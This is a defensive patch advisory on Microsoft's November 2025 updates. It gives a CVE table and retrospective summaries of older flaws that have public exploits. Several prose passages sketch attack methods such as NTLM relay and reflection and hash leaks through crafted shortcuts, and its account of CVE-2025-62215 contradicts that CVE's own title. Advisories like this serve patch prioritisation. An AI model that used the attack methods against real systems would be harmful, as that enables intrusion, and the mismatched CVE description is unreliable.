Analysis of Microsoft Patch Tuesday updates - November 2025
Executive Summary
On Tuesday, 11.11.2025, Microsoft released its monthly security patch addressing 63 vulnerabilities in its products.
By severity:
- Critical - 4;
- Important - 59.
Exploited (Zero-Days) and Publicly Disclosed Vulnerabilities
Special attention should be paid to the following vulnerability. Fixing it is the highest priority:
- CVE-2025-62215 (CVSS 7.0; Important) - Windows Kernel Elevation of Privilege Vulnerability (Elevation of Privilege).An SMB server vulnerability (CWE-287) that allows a remote unauthenticated attacker to carry out "NTLM Relay" attacks. To exploit it, the attacker must coerce a user or computer in the target network into initiating a connection to an attacker-controlled SMB server. The attacker can capture and relay authentication data to another server, enabling actions in the name of the compromised user. If successful, this can lead to privilege escalation to SYSTEM if the victim account has the required rights. The vulnerability is relevant to systems where SMB Signing and Extended Protection for Authentication (EPA) are not enabled.
General overview and trends
November 2025 Patch Tuesday can be described as a relative lull after the massive October update. Microsoft addressed 63 vulnerabilities, a significant drop compared to 175 last month. Despite the smaller volume, this release includes several serious threats that require prompt action. Key trends observed this month:
- Actively exploited NTLM Relay vulnerability: The main event this month is the fix for vulnerability CVE-2025-62215, which is already being actively used by attackers to conduct NTLM Relay attacks. Although the vulnerability is rated "Important", active exploitation makes remediating it the top priority. Networks are especially vulnerable where SMB Signing and Extended Protection for Authentication (EPA) are not enabled.
- Continued dominance of Elevation of Privilege (EoP) vulnerabilities: As in previous months, Elevation of Privilege vulnerabilities make up a significant portion of the fixes. This month they affect key components such as the Windows kernel, the Common Log File System (CLFS), drivers, and various system services, underscoring the ongoing need to harden the OS’s internal security mechanisms.
- Vulnerabilities in developer tools and AI: This month again highlights the security of modern tooling. The remote code execution vulnerability CVE-2025-62222 in Agentic AI and Visual Studio Code, along with security feature bypass issues in Copilot, point to a shift in attack focus toward development environments, which are becoming an increasingly attractive target.
- The return of old familiar issues: The Routing and Remote Access Service (RRAS) is back on the list with multiple vulnerabilities, including RCE. This, along with numerous fixes for Microsoft Office and Excel, confirms that these components remain persistent sources of risk and require regular attention from administrators.
Full List of Vulnerabilities
Below is a table of all vulnerabilities fixed this month.
| CVE | Title | Type | CVSS | Severity | Exploited | Publicly Disclosed |
|---|---|---|---|---|---|---|
| CVE-2025-62215 | Windows Kernel Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | Yes | No |
| CVE-2025-60724 | GDI+ Remote Code Execution Vulnerability | Remote Code Execution | 9.8 | Important | No | No |
| CVE-2025-59499 | Microsoft SQL Server Elevation of Privilege Vulnerability | Elevation of Privilege | 8.8 | Important | No | No |
| CVE-2025-62220 | Windows Subsystem for Linux GUI Remote Code Execution Vulnerability | Remote Code Execution | 8.8 | Important | No | No |
| CVE-2025-62222 | Agentic AI and Visual Studio Code Remote Code Execution Vulnerability | Remote Code Execution | 8.8 | Important | No | No |
| CVE-2025-62210 | Dynamics 365 Field Service (online) Spoofing Vulnerability | Spoofing | 8.7 | Important | No | No |
| CVE-2025-62211 | Dynamics 365 Field Service (online) Spoofing Vulnerability | Spoofing | 8.7 | Important | No | No |
| CVE-2025-30398 | Nuance PowerScribe 360 Information Disclosure Vulnerability | Information Disclosure | 8.1 | Critical | No | No |
| CVE-2025-60715 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | Remote Code Execution | 8.0 | Important | No | No |
| CVE-2025-62204 | Microsoft SharePoint Remote Code Execution Vulnerability | Remote Code Execution | 8.0 | Important | No | No |
| CVE-2025-62452 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | Remote Code Execution | 8.0 | Important | No | No |
| CVE-2025-59505 | Windows Smart Card Reader Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-59511 | Windows WLAN Service Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-59512 | Customer Experience Improvement Program (CEIP) Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-59514 | Microsoft Streaming Service Proxy Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60703 | Windows Remote Desktop Services Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60705 | Windows Client-Side Caching Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60707 | Multimedia Class Scheduler Service (MMCSS) Driver Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60709 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60710 | Host Process for Windows Tasks Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60713 | Windows Routing and Remote Access Service (RRAS) Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60714 | Windows OLE Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-60718 | Windows Administrator Protection Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60720 | Windows Transport Driver Interface (TDI) Translation Driver Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60721 | Windows Administrator Protection Elevation of Privilege Vulnerability | Elevation of Privilege | 7.8 | Important | No | No |
| CVE-2025-60727 | Microsoft Excel Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-62199 | Microsoft Office Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Critical | No | No |
| CVE-2025-62200 | Microsoft Excel Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-62201 | Microsoft Excel Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-62203 | Microsoft Excel Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-62205 | Microsoft Office Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-62216 | Microsoft Office Remote Code Execution Vulnerability | Remote Code Execution | 7.8 | Important | No | No |
| CVE-2025-60704 | Windows Kerberos Elevation of Privilege Vulnerability | Elevation of Privilege | 7.5 | Important | No | No |
| CVE-2025-59504 | Azure Monitor Agent Remote Code Execution Vulnerability | Remote Code Execution | 7.3 | Important | No | No |
| CVE-2025-60726 | Microsoft Excel Information Disclosure Vulnerability | Information Disclosure | 7.1 | Important | No | No |
| CVE-2025-62202 | Microsoft Excel Information Disclosure Vulnerability | Information Disclosure | 7.1 | Important | No | No |
| CVE-2025-59506 | DirectX Graphics Kernel Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-59507 | Windows Speech Runtime Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-59508 | Windows Speech Recognition Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-59515 | Windows Broadcast DVR User Service Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-60716 | DirectX Graphics Kernel Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Critical | No | No |
| CVE-2025-60717 | Windows Broadcast DVR User Service Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-60719 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-62213 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-62217 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-62218 | Microsoft Wireless Provisioning System Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-62219 | Microsoft Wireless Provisioning System Elevation of Privilege Vulnerability | Elevation of Privilege | 7.0 | Important | No | No |
| CVE-2025-62449 | Microsoft Visual Studio Code CoPilot Chat Extension Security Feature Bypass Vulnerability | Security Feature Bypass | 6.8 | Important | No | No |
| CVE-2025-47179 | Configuration Manager Elevation of Privilege Vulnerability | Elevation of Privilege | 6.7 | Important | No | No |
| CVE-2025-62214 | Visual Studio Remote Code Execution Vulnerability | Remote Code Execution | 6.7 | Critical | No | No |
| CVE-2025-60708 | Storvsp.sys Driver Denial of Service Vulnerability | Denial of Service | 6.5 | Important | No | No |
| CVE-2025-60722 | Microsoft OneDrive for Android Elevation of Privilege Vulnerability | Elevation of Privilege | 6.5 | Important | No | No |
| CVE-2025-62206 | Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability | Information Disclosure | 6.5 | Important | No | No |
| CVE-2025-60723 | DirectX Graphics Kernel Denial of Service Vulnerability | Denial of Service | 6.3 | Important | No | No |
| CVE-2025-59240 | Microsoft Excel Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-59509 | Windows Speech Recognition Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-59510 | Windows Routing and Remote Access Service (RRAS) Denial of Service Vulnerability | Denial of Service | 5.5 | Important | No | No |
| CVE-2025-59513 | Windows Bluetooth RFCOM Protocol Driver Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-60706 | Windows Hyper-V Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-62208 | Windows License Manager Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-62209 | Windows License Manager Information Disclosure Vulnerability | Information Disclosure | 5.5 | Important | No | No |
| CVE-2025-62453 | GitHub Copilot and Visual Studio Code Security Feature Bypass Vulnerability | Security Feature Bypass | 5.0 | Important | No | No |
| CVE-2025-60728 | Microsoft Excel Information Disclosure Vulnerability | Information Disclosure | 4.3 | Important | No | No |
Retrospective analysis of vulnerabilities
- CVE-2025-53766 - GDI+ Remote Code Execution Vulnerability (Remote Code Execution). The vulnerability is a heap-based buffer overflow in the GDI+ library (gdiplus.dll) that occurs when processing a specially crafted metafile embedded in an image or document. The issue stems from an incorrect memory offset calculation in the EpScanBitmap::NextBuffer function, which leads to writing data beyond the allocated buffer. A detailed technical analysis and a comparison of the vulnerable and patched versions of the library is available on GitHub. The vulnerability was fixed in August 2025.
- CVE-2025-50168 - Win32k Elevation of Privilege Vulnerability (Elevation of Privilege). A "Type Confusion" vulnerability (use of an incompatible type) in the DirectComposition kernel component that causes a heap-based buffer overflow and allows a local user to elevate privileges to SYSTEM. A public exploit for this vulnerability was presented at Pwn2Own Berlin 2025. The vulnerability was fixed in August 2025.
- CVE-2025-54110 - Windows Kernel Elevation of Privilege Vulnerability (Elevation of Privilege). A Windows kernel vulnerability caused by an integer overflow during memory allocation. A low-privileged local user can send specially crafted data that results in incorrect buffer allocation and allows arbitrary code execution with SYSTEM privileges. A GitHub lab with a public PoC, demonstrating exploitation. The vulnerability was fixed in September 2025.
- CVE-2025-54897 - Microsoft SharePoint Remote Code Execution Vulnerability (Remote Code Execution). A vulnerability caused by unsafe deserialization of untrusted data (CWE-502) that allows an authenticated attacker—even with low privileges—to execute arbitrary code on the server. For demonstration, a detailed Lab/PoC, containing a ready-to-use exploit for carrying out the attack. The vulnerability was fixed in September 2025.
- CVE-2025-54918 - Windows NTLM Elevation of Privilege Vulnerability (Elevation of Privilege). A vulnerability in the NTLM protocol that enables an authentication reflection (NTLM reflection) attack for privilege escalation. A PoC was found on GitHub PoC for this vulnerability. Exploitation uses a combination of two techniques: first, using the "Printer Bug" exploit (implemented in the printerbugnew.py script via RPC-over-TCP), the target system—for example, a Windows Server 2025 domain controller—is forced to authenticate to the attacker’s machine. This authentication is then reflected to a critical service, such as LDAPS, on the target system itself. The issue is that this method can bypass protections such as LDAP Channel Binding, resulting in SYSTEM-level privileges. The vulnerability was fixed in September 2025.
- CVE-2025-55315 - ASP.NET Security Feature Bypass Vulnerability (Security Feature Bypass). A critical HTTP Request Smuggling vulnerability in the ASP.NET Core Kestrel web server with a CVSS score of 9.9. It allows an attacker to "hide" a second request inside the first and bypass defenses (e.g., proxies), steal user sessions, or perform SSRF attacks. The technical mechanism—based on the server interpreting a chunk header with a single newline character (\n) instead of the standard (\r\n)—is described in detail in an article. A public exploit is available on GitHub CVE-2025-55315-PoC-Exploit. The vulnerability was fixed in October 2025.
- CVE-2025-59287 - Windows Server Update Service (WSUS) Remote Code Execution Vulnerability (Remote Code Execution). The vulnerability is related to unsafe data deserialization. A remote unauthenticated attacker can send a specially crafted request to the WSUS web service containing a malicious object encrypted with a known static key. The server decrypts and deserializes the object, leading to arbitrary code execution with SYSTEM privileges. Technical analysis and PoC for this vulnerability were published by the researcher hawktrace. The vulnerability was fixed in October 2025.
- CVE-2025-59214 - Microsoft Windows File Explorer Spoofing Vulnerability (Spoofing). A Windows File Explorer vulnerability that bypasses the fix for CVE-2025-50154 allows disclosure of a user’s NTLMv2-SSP password hash without directly interacting with the file (zero-click). The attack is carried out using a specially crafted shortcut file (.LNK) that points to an executable on a remote SMB server. When File Explorer attempts to display the icon of such a shortcut, it automatically connects to the remote resource, triggering the NTLM hash to be sent to the attacker’s server. A PoC and a detailed description are published on GitHub. The vulnerability was fixed in October 2025.
Conclusion
November 2025’s security update, while smaller than the previous one, is critical due to the presence of an actively exploited vulnerability. Administrators should avoid a false sense of security from the lower number of fixes and act promptly. Priority should be given to immediately installing updates for the following vulnerabilities:
- Actively exploited CVE-2025-62215 (Windows Kernel, EoP), to prevent NTLM Relay attacks and unauthorized privilege escalation in the network.
- All 4 critical vulnerabilities affecting Microsoft Office (CVE-2025-62199), Nuance PowerScribe (CVE-2025-30398), DirectX (CVE-2025-60716) and Visual Studio (CVE-2025-62214), as they can lead to arbitrary code execution or disclosure of sensitive information.
It is also recommended to pay attention to servers with RRAS and SharePoint roles, as well as developer workstations using Visual Studio Code and AI assistants.
Finally, it is extremely important to pay attention to the section "Retrospective analysis of vulnerabilities". The publication of PoC exploits for vulnerabilities fixed in previous months multiplies the risk of exploitation. If you still haven't installed the August, September, and October updates, now is the time to do so to close attack vectors that have become publicly known.
